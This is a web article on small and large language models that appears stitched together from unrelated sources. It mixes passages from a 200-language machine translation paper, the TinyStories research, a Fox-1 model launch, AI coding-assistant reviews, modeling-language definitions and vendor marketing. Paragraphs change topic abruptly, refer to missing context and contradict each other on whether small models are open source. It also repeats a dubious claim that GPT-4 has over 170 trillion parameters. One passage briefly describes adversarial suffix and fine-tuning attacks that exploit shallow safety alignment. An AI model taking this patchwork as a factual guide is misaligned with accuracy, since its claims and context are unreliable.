 

Scaling neural machine translation to 200 languages


TinyStories: How Small Can Language Models Be and Still Speak Coherent English? (arXiv:2305.07759)


BLEU measures the overlap between machine and human translations by combining the precision of 1-grams to 4-grams with a brevity penalty. Efforts such as sacrebleu (ref. 67) have taken strides towards standardization, supporting the use of community-standard tokenizers under the hood. Reference 41 proposes spBLEU, a BLEU metric based on a standardized SentencePiece model (SPM) covering 101 languages, released alongside FLORES-101. In this work, we provide SPM-200 along with FLORES-200 to enable the measurement of spBLEU.

Domain-specific modeling (DSM) is a software engineering methodology for designing and developing systems, most often IT systems such as computer software. It involves the systematic use of a graphical domain-specific language (DSL) to represent the various facets of a system.
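As a rough illustration of how these metrics are computed in practice, the sketch below scores a couple of hypothesis/reference pairs with sacrebleu. The sentences are invented, and the tokenize="flores200" option (which applies the FLORES-200 SentencePiece model to obtain spBLEU) assumes a recent sacrebleu release, so treat that flag as an assumption rather than a guarantee.

```python
# Minimal sketch: scoring translations with sacrebleu.
# The sentences are invented examples; tokenize="flores200" assumes a recent
# sacrebleu release that bundles the FLORES-200 SentencePiece model.
import sacrebleu

hypotheses = ["The cat sat on the mat.", "He reads a book every evening."]
references = [["The cat is sitting on the mat.", "Every evening he reads a book."]]

bleu = sacrebleu.corpus_bleu(hypotheses, references)             # standard BLEU
spbleu = sacrebleu.corpus_bleu(hypotheses, references,
                               tokenize="flores200")             # spBLEU (SPM tokenization)
chrfpp = sacrebleu.corpus_chrf(hypotheses, references,
                               word_order=2)                     # chrF++ (char n-grams + word 1/2-grams)

print(f"BLEU    {bleu.score:.1f}")
print(f"spBLEU  {spbleu.score:.1f}")
print(f"chrF++  {chrfpp.score:.1f}")
```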

A modeling language is any artificial language that can be used to express data, information, knowledge or systems in a structure that is defined by a consistent set of rules. The rules are used for interpretation of the meaning of components in the structure of the language.

The high throughput of Fox-1 can largely be attributed to its architectural design, which incorporates Grouped Query Attention (GQA) for more efficient query processing. More specifically, by dividing the query heads into groups that share a common key and value head, Fox-1 reduces inference latency and improves response times.
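To make the grouped-query idea concrete, here is a minimal sketch of a GQA attention block in PyTorch. It is not Fox-1's actual implementation; the head counts and dimensions are illustrative, and the only point it demonstrates is that several query heads share one key/value head.

```python
# Minimal sketch of grouped-query attention (GQA): n_q query heads share
# n_kv (< n_q) key/value heads. Illustrative only, not Fox-1's implementation.
import torch
import torch.nn as nn
import torch.nn.functional as F

class GroupedQueryAttention(nn.Module):
    def __init__(self, d_model=512, n_q_heads=8, n_kv_heads=2):
        super().__init__()
        assert n_q_heads % n_kv_heads == 0
        self.n_q, self.n_kv = n_q_heads, n_kv_heads
        self.d_head = d_model // n_q_heads
        self.wq = nn.Linear(d_model, n_q_heads * self.d_head)
        self.wk = nn.Linear(d_model, n_kv_heads * self.d_head)   # fewer K heads
        self.wv = nn.Linear(d_model, n_kv_heads * self.d_head)   # fewer V heads
        self.wo = nn.Linear(n_q_heads * self.d_head, d_model)

    def forward(self, x):
        b, t, _ = x.shape
        q = self.wq(x).view(b, t, self.n_q, self.d_head).transpose(1, 2)
        k = self.wk(x).view(b, t, self.n_kv, self.d_head).transpose(1, 2)
        v = self.wv(x).view(b, t, self.n_kv, self.d_head).transpose(1, 2)
        # each group of n_q / n_kv query heads reuses the same K/V head
        rep = self.n_q // self.n_kv
        k = k.repeat_interleave(rep, dim=1)
        v = v.repeat_interleave(rep, dim=1)
        att = F.softmax(q @ k.transpose(-2, -1) / self.d_head ** 0.5, dim=-1)
        out = (att @ v).transpose(1, 2).reshape(b, t, -1)
        return self.wo(out)

x = torch.randn(1, 16, 512)
print(GroupedQueryAttention()(x).shape)  # torch.Size([1, 16, 512])
```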

It provides an easy way to add code snippets without having to dig down into the weeds to add them manually. Its easy plug-and-play design is attractive for people who understand code but lack the skills to implement it in core WordPress theme files without using a child theme. Some bright points include simple integration with VS Code and other popular IDEs, and it is a great tool for learning how to code. However, some users say the documentation could be improved, often requiring a visit to Discord for an answer.

small language models

Analyze the output generated by the model and compare it with your expectations or ground truth to assess its effectiveness accurately. Once you’ve identified the right model, the next step is to obtain the pre-trained version. However, it’s paramount to prioritize data privacy and integrity during the download process. Be sure to choose the version compatible with your chosen framework and library.
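As an illustration of the "obtain the pre-trained version" step, the sketch below downloads a small pre-trained causal language model with the Hugging Face transformers library and runs a quick smoke test. The model name is only a stand-in for whichever checkpoint you have chosen, and the library choice itself is an assumption rather than something the article prescribes.

```python
# Minimal sketch: downloading a pre-trained model and tokenizer with
# Hugging Face transformers and running a quick sanity check.
# "gpt2" is only a stand-in for the checkpoint you actually selected.
from transformers import AutoModelForCausalLM, AutoTokenizer

model_name = "gpt2"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)

inputs = tokenizer("Small language models are", return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=20)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```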

We also find that calibrated human evaluation scores correlate more strongly with automated scores than uncalibrated human evaluation scores across all automated metrics and choices of correlation coefficient. In particular, uncalibrated human evaluation scores have a Spearman's R correlation coefficient of 0.625, 0.607 and 0.611 for spBLEU, chrF++ (corpus) and chrF++ (average sentence-level), respectively.

[Figure caption: a–d, the first (a) and last (b) encoder layers, and the first (c) and last (d) decoder layers. Similarity is measured with respect to the gating decisions (expert choice) per language: source side in the encoder and target side in the decoder.]
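A quick sketch of how a correlation like the one reported above can be computed with SciPy; the score arrays are fabricated placeholders, not the study's data.

```python
# Minimal sketch: Spearman's R between human evaluation scores and an
# automated metric (e.g. spBLEU). The numbers are invented placeholders,
# not data from the study.
from scipy.stats import spearmanr

human_scores = [3.2, 4.1, 2.5, 4.8, 3.9, 2.2]          # human evaluation scores
metric_scores = [21.0, 30.5, 15.2, 34.1, 27.8, 12.9]   # automated metric per direction

rho, p_value = spearmanr(human_scores, metric_scores)
print(f"Spearman's R = {rho:.3f} (p = {p_value:.3f})")
```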

Synthetic text generated by large models could offer an alternative way to assemble high-quality data sets that wouldn’t have to be so large. Eldan and Li used a two-step procedure for evaluating each of their small models after training. First, they prompted the small model with the first half of a story distinct from those in the training data set so that it generated a new ending, repeating this process with 50 different test stories. Second, they instructed GPT-4 to grade each of the small model’s endings based on three categories: creativity, grammar and consistency with the beginning of the story. They then averaged the scores in each category, ending up with three final grades per model. The two researchers showed that language models thousands of times smaller than today’s state-of-the-art systems rapidly learned to tell consistent and grammatical stories when trained in this way.

Modeling language

Some common complaints are bugs on the iOS platform and the inability to keep your work private unless you sign up for one of the paid plans. Replit, an online coding platform, provides an interactive space for users to code, collaborate, and learn collectively. It’s known for its browser-based IDE that allows co-coding within documents and native hosting. Have you considered supercharging your coding experience with AI coding assistants? These powerful tools revolutionize productivity, enabling faster and more accurate code writing while freeing up time for creative work on the challenging problems you are solving.

  • The code it produced was mostly free of errors, clean, and of high quality.
  • Initially, he wanted to train models to solve a certain class of math problems, but one afternoon, after spending time with his 5-year-old daughter, he realized that children’s stories were a perfect fit.
  • Eldan hoped the brevity and limited vocabulary of children’s stories might make learning more manageable for small models — making them both easier to train and easier to understand.
  • Enterprises using LLMs may risk exposing sensitive data through APIs, whereas SLMs, often not open source, present a lower risk of data leakage.
  • This does not put SLMs at a disadvantage, and when used in appropriate use cases, they can be more beneficial than LLMs.

There is also a concern about highly agglutinative languages, in which BLEU fails to assign any credit to morphological variants. chrF++ overcomes these weaknesses by basing the overlap calculation on a character-level n-gram F-score (n ranging from 1 to 6) and complementing it with word unigrams and bigrams. In this work, we primarily evaluated with chrF++, using the settings from sacrebleu. However, when comparing with other published work, we used BLEU and spBLEU where appropriate. Our results directed us to focus on the second approach, which offers several advantages.
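For reference, the chrF family combines character n-gram precision (chrP) and recall (chrR) into an F-score; the formula below is standard background on the metric (with β = 2 weighting recall more heavily), not text quoted from this article:

$$\mathrm{chrF}_{\beta} = (1 + \beta^{2}) \cdot \frac{\mathrm{chrP} \cdot \mathrm{chrR}}{\beta^{2} \cdot \mathrm{chrP} + \mathrm{chrR}}$$

chrF++ extends the n-gram pool with word unigrams and bigrams, as described above.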

“In many ways, the models that we have today are going to be child’s play compared to the models coming in five years,” she said. Some people found the earlier Llama 2 model, released less than a year ago, to be “a little stiff and sanctimonious sometimes in not responding to what were often perfectly innocuous or innocent prompts and questions,” he said. The Claude LLM focuses on constitutional AI, which shapes AI outputs guided by a set of principles that help make the AI assistant it powers helpful, harmless and accurate.

Financial corporations also deploy SLMs for needs around analyzing earnings statements, asset valuations, risk modeling and more. As we mentioned above, there are some tradeoffs to consider when opting for a small language model over a large one. The first scoring function is the probability of the label given the prompt; it is the most straightforward method, giving the probability of the continuation.
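A minimal sketch of that "probability of the label given the prompt" scoring function, assuming a Hugging Face causal LM: each candidate label is scored by the sum of its token log-probabilities after the prompt, and the highest-scoring label wins. The model name, prompt, and labels are illustrative, and the simple token alignment assumes the label tokenizes cleanly after the prompt.

```python
# Minimal sketch of label-probability scoring: score each candidate label by
# log P(label tokens | prompt) under a causal LM, then pick the argmax.
# Model name, prompt and labels are illustrative placeholders.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_name = "gpt2"  # stand-in for any small causal LM
tok = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name).eval()

def label_logprob(prompt: str, label: str) -> float:
    """Log P(label tokens | prompt), assuming prompt+label tokenization aligns."""
    prompt_ids = tok(prompt, return_tensors="pt").input_ids
    full_ids = tok(prompt + label, return_tensors="pt").input_ids
    with torch.no_grad():
        logits = model(full_ids).logits
    # log-probs at each position for predicting the *next* token
    logprobs = torch.log_softmax(logits[:, :-1], dim=-1)
    targets = full_ids[:, 1:]
    token_lp = logprobs.gather(-1, targets.unsqueeze(-1)).squeeze(-1)
    # keep only the positions that predict the label tokens
    label_start = prompt_ids.shape[1] - 1
    return token_lp[:, label_start:].sum().item()

prompt = "The movie was dull and far too long. Sentiment:"
labels = [" positive", " negative"]
scores = {lab: label_logprob(prompt, lab) for lab in labels}
print(max(scores, key=scores.get))
```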

There are 3 billion and 7 billion parameter models available, and 15 billion, 30 billion, 65 billion and 175 billion parameter models in progress at the time of writing. First, because text requires fewer computational resources to synthesize than complex image data, their method can be used to rapidly generate synthetic training data. In one test, they generated 10,000 synthetic trajectories based on 10 real-world, visual trajectories.


You’ll get white-glove onboarding, integration with Git, and access control and security features. Unlike the others, its parameter count has not been released to the public, though there are rumors that the model has more than 170 trillion parameters. OpenAI describes GPT-4 as a multimodal model, meaning it can process and generate both language and images as opposed to being limited to only language. GPT-4 also introduced a system message, which lets users specify tone of voice and task. They also want to develop a navigation-oriented captioner that could boost the method’s performance.

When the source is conditioned on only the source language, the encoder generalizes better to pairs of source and target languages not encountered during training (ref. 1). Once we had identified the best sentence encoder for each language using the xsim scores, we performed mining, added the mined data to the existing bitexts and trained a bilingual NMT system. Initial experiments indicated that a threshold on the margin of 1.06 seems to be the best compromise between precision and recall for most languages. For these NMT baselines, we do not apply extra filtering on the bitexts and leave this to the training procedure of our massively multilingual NMT system.
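To illustrate what a margin threshold like 1.06 operates on, here is a small sketch of ratio-margin scoring for candidate sentence pairs, in the spirit of the standard margin criterion for bitext mining. The embeddings are random stand-ins, and the exact scoring details of the article's pipeline are not reproduced here.

```python
# Minimal sketch of ratio-margin scoring for bitext mining: the cosine
# similarity of a candidate pair is divided by the average similarity of
# each sentence to its k nearest neighbours, and pairs whose margin exceeds
# a threshold (e.g. 1.06) are kept. Embeddings here are random stand-ins.
import numpy as np

def normalize(m):
    return m / np.linalg.norm(m, axis=1, keepdims=True)

rng = np.random.default_rng(0)
src = normalize(rng.normal(size=(1000, 256)))   # source-language sentence embeddings
tgt = normalize(rng.normal(size=(1000, 256)))   # target-language sentence embeddings
k, threshold = 4, 1.06

sim = src @ tgt.T                                       # cosine similarities
knn_src = np.sort(sim, axis=1)[:, -k:].mean(axis=1)     # avg sim of each src to its k NN
knn_tgt = np.sort(sim, axis=0)[-k:, :].mean(axis=0)     # avg sim of each tgt to its k NN

best_tgt = sim.argmax(axis=1)
margin = sim[np.arange(len(src)), best_tgt] / ((knn_src + knn_tgt[best_tgt]) / 2.0)

mined = [(i, j) for i, j in enumerate(best_tgt) if margin[i] > threshold]
print(f"kept {len(mined)} candidate pairs out of {len(src)}")
```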

In artificial intelligence, Large Language Models (LLMs) and Small Language Models (SLMs) represent two distinct approaches, each tailored to specific needs and constraints. While LLMs, exemplified by GPT-4 and similar giants, showcase the height of language processing with vast parameters, SLMs operate on a more modest scale, offering practical solutions for resource-limited environments. Although authors of LLMs have compared their different model sizes (Kaplan et al., 2020; Hoffmann et al., 2022), this study widens this analysis by directly comparing different architectures on an extensive set of datasets.

The integration of Fox-1 into both the TensorOpera AI Platform and the TensorOpera FedML Platform further enhances its versatility, enabling its deployment and training across both cloud and edge computing environments. This approach offers cost efficiency, enhanced privacy, and personalized user experiences, all within a unified ecosystem that facilitates seamless collaboration between cloud and edge environments.

One of the most significant advantages of SLMs is their operational efficiency. Their streamlined design leads to lower computational demands, making them suitable for environments with limited hardware capabilities or lower cloud resource allocations. Eldan and Li hope that the research will motivate other researchers to train different models on the TinyStories data set and compare their capabilities.

Its small size is ideal for running locally, which could bring an AI model of similar capability to the free version of ChatGPT to a smartphone without needing an Internet connection to run it. Once the language model has completed its run, evaluating its performance is crucial. Calculate relevant metrics such as accuracy, perplexity, or F1 score, depending on the nature of your task.
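As a concrete example of one of those metrics, the sketch below computes perplexity, the exponential of the average negative log-likelihood per token, for a causal language model using Hugging Face transformers. The model name and evaluation text are illustrative placeholders.

```python
# Minimal sketch of one evaluation metric mentioned above: perplexity of a
# causal LM on a held-out text, computed as exp(mean cross-entropy per token).
# The model and text are illustrative placeholders.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

tok = AutoTokenizer.from_pretrained("gpt2")
model = AutoModelForCausalLM.from_pretrained("gpt2").eval()

text = "Once upon a time there was a small model that told short stories."
ids = tok(text, return_tensors="pt").input_ids
with torch.no_grad():
    # passing labels makes the model return the mean cross-entropy loss
    loss = model(ids, labels=ids).loss
print(f"perplexity: {torch.exp(loss).item():.2f}")
```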


These techniques often combine preference-based optimization techniques like Direct Preference Optimisation (DPO) and Reinforcement Learning from Human Feedback (RLHF) with supervised fine-tuning (SFT). By modifying the models to avoid interacting with hazardous inputs, these strategies seek to reduce the likelihood of producing damaging material. But she said the “question on the table” is whether researchers have been able to fine-tune its bigger Llama 3 model so that it’s safe to use and doesn’t, for example, hallucinate or engage in hate speech. In contrast to leading proprietary systems from Google and OpenAI, Meta has so far advocated for a more open approach, publicly releasing key components of its AI systems for others to use. Getting to AI systems that can perform higher-level cognitive tasks and commonsense reasoning, where humans still excel, might require a shift beyond building ever-bigger models. Llama uses a transformer architecture and was trained on a variety of public data sources, including webpages from CommonCrawl, GitHub, Wikipedia and Project Gutenberg.

We limit this evaluation to simple prompting methods and hand-crafted, unoptimized prompts. Table 8 reports the ANCOVA results for the impact of different scoring functions on performance for the two architectures. On the other hand, datasets such as cdr, ethos, and financial_phrasebank remain unaffected by the architectural choice.

Additionally, AI code assistants elevate code quality, offering expert guidance to write efficient, maintainable, and secure code. And they are one of the best learning tools for exploring languages you need to become more familiar with. ChatGPT, which runs on a set of language models from OpenAI, attracted more than 100 million users just two months after its release in 2022.

Their results hint at new research directions that might be helpful for training larger models and understanding their behavior. Up to this point, we have covered the general capabilities of small language models and how they confer advantages in efficiency, customization, and oversight compared to massive generalized LLMs. However, SLMs also shine when homing in on specialized use cases by training on niche datasets.

Mistral also has a fine-tuned model that is specialized to follow instructions. Its smaller size enables self-hosting and competent performance for business purposes. LaMDA (Language Model for Dialogue Applications) is a family of LLMs developed by Google Brain and announced in 2021.

The Rise of Small Language Models. The New Stack. Posted: Fri, 16 Feb 2024 08:00:00 GMT [source]

The performance of LLMs varies based on multiple factors, including model size, architectural choices, and fine-tuning strategies. While larger model sizes do not consistently lead to improved performance across all datasets, the architectural choice significantly influences outcomes on specific datasets. The impact of instruction fine-tuning is also evident, but its efficacy is dependent on the architecture. Notably, the choice of scoring function doesn’t seem to make a marked difference in performance. We compare the performance of the LLMs on several datasets, studying the correlation with the number of parameters, the impact of the architecture, and the type of training strategy (instruction-tuned or not).

It’s a valuable resource for developers aiming to be more efficient, accurate, and secure in their coding endeavors.

A massively multilingual translation (MMT) model uses the same shared model capacity to train on several translation directions simultaneously. While doing so can lead to beneficial cross-lingual transfer between related languages, it can also add to the risk of interference between unrelated languages (refs. 1,61). MoE models are a type of conditional computation model (refs. 62,63) that activates a subset of model parameters per input, as opposed to dense models that activate all model parameters per input. MoE models unlock marked representational capacity while maintaining the same inference and training efficiencies in terms of FLOPs compared with the core dense architecture. In this section, we first describe the multilingual machine translation task setup, which includes tokenization and base model architecture.
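The sketch below illustrates the "activate a subset of model parameters per input" idea with a toy top-2 gated mixture-of-experts feed-forward layer. It is a generic MoE illustration, not the article's MMT architecture, and all sizes are made up.

```python
# Toy top-2 gated mixture-of-experts (MoE) feed-forward layer: each token is
# routed to only 2 of n_experts expert FFNs, so only a subset of parameters is
# activated per input. Generic illustration, not the article's architecture.
import torch
import torch.nn as nn
import torch.nn.functional as F

class TopKMoE(nn.Module):
    def __init__(self, d_model=128, d_ff=256, n_experts=8, k=2):
        super().__init__()
        self.k = k
        self.gate = nn.Linear(d_model, n_experts)
        self.experts = nn.ModuleList(
            nn.Sequential(nn.Linear(d_model, d_ff), nn.ReLU(), nn.Linear(d_ff, d_model))
            for _ in range(n_experts)
        )

    def forward(self, x):                       # x: (tokens, d_model)
        scores = self.gate(x)                   # (tokens, n_experts)
        top_w, top_idx = scores.topk(self.k, dim=-1)
        top_w = F.softmax(top_w, dim=-1)        # normalize weights of chosen experts
        out = torch.zeros_like(x)
        for slot in range(self.k):
            idx = top_idx[:, slot]
            w = top_w[:, slot].unsqueeze(-1)
            for e, expert in enumerate(self.experts):
                mask = idx == e                 # tokens routed to expert e in this slot
                if mask.any():
                    out[mask] += w[mask] * expert(x[mask])
        return out

tokens = torch.randn(10, 128)
print(TopKMoE()(tokens).shape)                  # torch.Size([10, 128])
```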

It’s compatible with numerous programming languages like Python, Java, JavaScript, PHP, Go, and Rust, making it one of our list’s most robust AI coding assistants. Tabnine helps increase productivity and improves code quality by offering smart completion suggestions and identifying potential errors. It’s an essential tool for developers looking to save time, enhance code quality, and lessen costs.

Mistral

The last paragraph stated that stakeholder knowledge should be presented in a clear way. In addition, it is imperative that the language be able to express all possible explicit knowledge of the stakeholders. Enterprises using LLMs may risk exposing sensitive data through third-party APIs, whereas SLMs, which can be run in-house, present a lower risk of data leakage.

Tiny but mighty: The Phi-3 small language models with big potential – Microsoft (posted Tue, 23 Apr 2024) [source]

AI for predictive analytics refers to the integration of artificial intelligence technologies into the field of predictive analytics, a domain that traditionally relies on statistical models and data analysis techniques. At LeewayHertz, we understand the transformative potential of Small Language Models (SLMs). These models offer businesses a unique opportunity to unlock deeper insights, streamline workflows, and achieve a competitive edge.

Plus, you can take Character AI wherever you go, thanks to the new Android and iOS apps. Systematic trials have shown that the main variation in safety behavior between aligned and unaligned models appears in the initial tokens of their outputs. This shallow alignment explains the effectiveness of attack techniques that focus on steering the very start of a harmful trajectory: adversarial suffix attacks and fine-tuning attacks, for instance, often drastically change the first tokens of a harmful response. Artificial Intelligence (AI) alignment strategies are critical in ensuring the safety of Large Language Models (LLMs).

LLMs such as GPT-4 are transforming enterprises with their ability to automate complex tasks like customer service, delivering rapid and human-like responses that enhance user experiences. However, their broad training on diverse datasets from the internet can result in a lack of customization for specific enterprise needs. This generality may lead to gaps in handling industry-specific terminology and nuances, potentially decreasing the effectiveness of their responses. Small Language Models achieve a unique equilibrium with their reduced parameter count, typically in the tens to hundreds of millions, as opposed to larger models which may possess billions of parameters.

The difference in results between the two architectures suggests that the impact of instruction-tuning might be architecture-dependent. Both the graphical analysis and the ANCOVA show an effect of instruction-tuning for the encoder-decoder architecture. For the causal decoder-only architecture, there is no significant impact of instruction-tuning on Acc/F1 scores: the p-value is 0.6693, much greater than 0.05.

That evidence comes from a pair of follow-up papers about billion-parameter models by Eldan, Li and other Microsoft researchers. In the first paper, they trained a model to learn the programming language Python using snippets of code generated by GPT-3.5 along with carefully curated code from the internet. In the second, they augmented the training data set with synthetic “textbooks,” covering a wide range of topics, to train a general-purpose language model. In their tests, both models compared favorably to larger models trained on larger data sets. But evaluating language models is always tricky, and the synthetic training data approach is still in its infancy — more independent tests are necessary.

With this procedure in hand, Eldan and Li were finally ready to compare different models and find out which were the star students.

In a discussion at MIT, Altman shared insights suggesting that reducing model parameters could be key to achieving superior results. Well-known LLMs include proprietary models like OpenAI’s GPT-4, as well as a growing roster of open-source contenders like Meta’s LLaMA. The Model column contains the name of each model in its HuggingFace repository; the Number of Parameters and Instruction-Tuned columns are self-explanatory. We focused on causal decoder-only and encoder-decoder models, without comparing them against encoder-only or non-causal decoder models, since recently released models concentrate on the former two architectures.

These methods make SLMs not only more relevant and accurate but also ensure they are specifically aligned with enterprise objectives. They can perform sentiment analysis to gauge public opinion and customer feedback, identify named entities for better information organization, and analyze market trends to optimize sales and marketing strategies. These capabilities help businesses make well-informed decisions, customize customer interactions, and drive innovation in product development.

Therefore, such a language offers a distinct vocabulary, syntax, and notation for each stage, such as discovery, analysis, design, architecture, construction, etc. For example, for the analysis phase of a project, the modeler employs specific analysis notation to deliver an analysis proposition diagram. During the design phase, however, logical design notation is used to depict the relationship between software entities. In addition, discipline-specific modeling language best practices do not preclude practitioners from combining the various notations in a single diagram. In essence, an SLM is a neural network designed to produce natural language text. The descriptor “small” refers not only to the model’s physical footprint but also to its parameter count, neural architecture, and the volume of data used during training.

As suggested by Holtzman et al. (2022), many valid sequences can represent the same concept, a phenomenon called surface form competition. For example, “+”, “positive”, and “more positive than the opposite” could all represent the same concept of positivity in a sentiment analysis task. Because this competition exists, how verbalizers are designed can either mitigate or exacerbate its effects, thereby influencing the overall effectiveness of the prompt-based classification approach. Zhao et al. (2023) use k-nearest-neighbor verbalizer construction and augment their verbalizers based on embedding similarity. For the fine-tuning process, we use about 10,000 question-and-answer pairs generated from Version 1’s internal documentation.
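One simple mitigation, sketched below, is to score every surface form in a verbalizer set and pool the probability mass per class (here with log-sum-exp) instead of relying on a single token; the verbalizer sets and the toy scoring stub are assumptions, and in practice the stub would be replaced by the LM log-likelihood of each surface form given the prompt.

import math

# Multiple surface forms ("verbalizers") that all express the same class.
VERBALIZERS = {
    "positive": [" positive", " good", " +"],
    "negative": [" negative", " bad", " -"],
}

def surface_form_logprob(prompt, form):
    # Placeholder: in practice, return the LM log-likelihood of `form` given `prompt`.
    toy_scores = {" positive": -2.1, " good": -3.0, " +": -6.5,
                  " negative": -4.2, " bad": -4.8, " -": -7.0}
    return toy_scores[form]

def class_score(prompt, forms):
    # Log-sum-exp pools probability mass that competition splits across synonyms.
    return math.log(sum(math.exp(surface_form_logprob(prompt, f)) for f in forms))

prompt = "Review: the film was a delight.\nSentiment:"
prediction = max(VERBALIZERS, key=lambda c: class_score(prompt, VERBALIZERS[c]))
print(prediction)   # -> "positive" with these toy scores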

TensorOpera, Inc. (formerly FedML, Inc.) is an innovative AI company based in Silicon Valley, specifically Palo Alto, California. TensorOpera specializes in developing scalable and secure AI platforms, offering two flagship products tailored for enterprises and developers. The TensorOpera® AI Platform, available at TensorOpera.ai, is a comprehensive generative AI platform for model deployment and serving, model training and fine-tuning, AI agent creation, and more. It supports launching training and inference jobs on a serverless/decentralized GPU cloud, experimental tracking for distributed training, and enhanced security and privacy measures.

Recent analysis has found that self-supervised learning appears particularly effective for imparting strong capabilities in small language models, more so than in larger models. By framing language modelling as a prediction challenge, self-supervised learning forces small models to generalize deeply from each example they see rather than passively memorizing statistics. How did Microsoft cram a capability potentially similar to GPT-3.5, which has at least 175 billion parameters, into such a small model? Its researchers found the answer by using carefully curated, high-quality training data initially pulled from textbooks. “The innovation lies entirely in our dataset for training, a scaled-up version of the one used for phi-2, composed of heavily filtered web data and synthetic data,” writes Microsoft. Unlike LLMs trained on massive, general datasets, SLMs can be fine-tuned to excel in specific domains, such as finance, healthcare, or customer service.

Often software modeling tools are used to construct these models, which may then be capable of automatic translation to code. TensorOpera, the company providing “Your Generative AI Platform at Scale”, is excited to announce the launch of TensorOpera Fox-1. This 1.6-billion parameter small language model (SLM) is designed to advance scalability and ownership in the generative AI landscape. Fox-1 stands out by delivering top-tier performance, surpassing comparable SLMs developed by industry giants such as Apple, Google, and Alibaba. Parameters are numeric values that direct a model’s interpretation of inputs and the generation of outputs. A model with fewer parameters is inherently simpler, necessitating less training data and consuming fewer computational resources.

This platform offers an integrated environment for hosting datasets, orchestrating model training pipelines, and efficiently deploying models through APIs or applications. Notably, the Clara Train module specializes in crafting compact yet proficient SLMs through state-of-the-art self-supervised learning techniques. While working on projects, it’s important to remember several key considerations to overcome potential issues. Saving checkpoints during training ensures continuity and facilitates model recovery in case of interruptions. Optimizing your code and data pipelines maximizes efficiency, especially when operating on a local CPU where resources may be limited. Additionally, leveraging GPU acceleration or cloud-based resources can address scalability concerns in the future, ensuring your model can handle increasing demands effectively.
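A minimal checkpointing routine in PyTorch, assuming a model and optimizer of your choice, might look like the sketch below; the file name and the toy linear model are placeholders.

import torch

def save_checkpoint(path, model, optimizer, step):
    """Persist everything needed to resume training after an interruption."""
    torch.save({
        "step": step,
        "model_state": model.state_dict(),
        "optimizer_state": optimizer.state_dict(),
    }, path)

def load_checkpoint(path, model, optimizer):
    ckpt = torch.load(path, map_location="cpu")
    model.load_state_dict(ckpt["model_state"])
    optimizer.load_state_dict(ckpt["optimizer_state"])
    return ckpt["step"]

# Toy usage with a throwaway model and optimizer.
model = torch.nn.Linear(10, 2)
optimizer = torch.optim.AdamW(model.parameters(), lr=1e-3)
save_checkpoint("slm_checkpoint_step100.pt", model, optimizer, step=100)
print("resuming from step", load_checkpoint("slm_checkpoint_step100.pt", model, optimizer))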

Additionally, it provides a user-friendly interface and interactive data dashboards, so even newcomers can navigate it easily. So, those looking for the best AI coding assistants for SQL query generation will find SQLAI the perfect solution. Codiga supports 12 programming languages, including C, C++, Java, JavaScript, TypeScript, PHP, and more.

On the contrary, executable modeling languages are intended to amplify the productivity of skilled programmers, so that they can address more challenging problems, such as parallel computing and distributed systems. Fox-1 was trained from scratch with a 3-stage data curriculum on 3 trillion tokens of text and code data in 8K sequence length. In various benchmarks, such as MMLU, ARC Challenge, TruthfulQA, and GSM8k, Fox-1 performs better or on par with other SLMs in its class including Gemma-2B, Qwen1.5-1.8B, and OpenELM-1.1B. Customization of SLMs requires data science expertise, with techniques such as LLM fine-tuning and Retrieval Augmented Generation (RAG) to enhance model performance.
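To show what the retrieval half of RAG involves, here is a deliberately small sketch that indexes a placeholder document set with TF-IDF and builds an augmented prompt; real deployments would use a neural embedding model, a vector store, and the SLM itself for the final generation step, none of which are shown here.

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# Tiny placeholder knowledge base; in practice these would be chunks of internal docs.
documents = [
    "Fox-1 is a 1.6-billion parameter small language model trained on 3 trillion tokens.",
    "Retrieval Augmented Generation prepends retrieved context to the model prompt.",
    "Fine-tuning adapts a pretrained model to a narrow, domain-specific dataset.",
]

vectorizer = TfidfVectorizer().fit(documents)
doc_vectors = vectorizer.transform(documents)

def retrieve(query, k=2):
    sims = cosine_similarity(vectorizer.transform([query]), doc_vectors)[0]
    return [documents[i] for i in sims.argsort()[::-1][:k]]

query = "How many parameters does Fox-1 have?"
context = "\n".join(retrieve(query))
prompt = f"Answer using the context.\n\nContext:\n{context}\n\nQuestion: {query}\nAnswer:"
print(prompt)   # this augmented prompt would then be passed to the SLM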

To use Studio Bot for AI code completion, it must be able to access context from your codebase. Therefore, it requires you to download Android Studio Iguana and install it onto your local machine. Sourcegraph Cody is your AI-powered assistant for coding that accelerates your workflow and enriches your understanding of whole code bases. The main product of Sourcegraph is a code base assistant that helps you search across the board to discover where code lives and who’s updated it—and it does this across entire repos, branches, and code hosts. Cody integrates into popular IDEs, such as VS Code, JetBrains, and Neovim, and allows users to complete code as they type.

Proxy metric for new encoders

But large models trained on massive data sets learn countless irrelevant details along with the rules that really matter. Eldan hoped the brevity and limited vocabulary of children’s stories might make learning more manageable for small models, making them both easier to train and easier to understand. Ronen Eldan, a mathematician who joined Microsoft Research in 2022 to study generative language models, wanted to develop a cheaper and faster way to explore their abilities. The natural way to do that was by using a small data set, and that in turn meant he’d have to train models to specialize in a specific task, so they wouldn’t spread themselves too thin.

Our experts work with you through close collaboration to craft a tailored strategy for Small Language Model (SLM) development that seamlessly aligns with your business objectives. Beyond simply constructing models, we focus on delivering solutions that yield measurable outcomes. Continuous research efforts are dedicated to narrowing the efficiency gap between small and large models, aiming for enhanced capabilities. Moreover, the foreseeable future anticipates cross-sector adoption of these agile models as various industries recognize their potential.

This involves installing the necessary libraries and dependencies, particularly focusing on Python-based ones such as TensorFlow or PyTorch. These libraries provide pre-built tools for machine learning and deep learning tasks, and you can easily install them using popular package managers like pip or conda. Understanding the differences between Large Language Models (LLMs) and Small Language Models (SLMs) is crucial for selecting the most suitable model for various applications. While LLMs offer advanced capabilities and excel in complex tasks, SLMs provide a more efficient and accessible solution, particularly for resource-limited environments. Both models contribute to the diverse landscape of AI applications, each with strengths and potential impact.
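After installing the libraries, a quick sanity check like the one below confirms that the stack imports cleanly and reports whether GPU acceleration is available; it assumes PyTorch was the framework chosen.

import torch

print("PyTorch version:", torch.__version__)
print("CUDA available:", torch.cuda.is_available())
if torch.cuda.is_available():
    print("GPU:", torch.cuda.get_device_name(0))
else:
    print("Running on CPU; consider GPU or cloud resources for larger training runs.")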


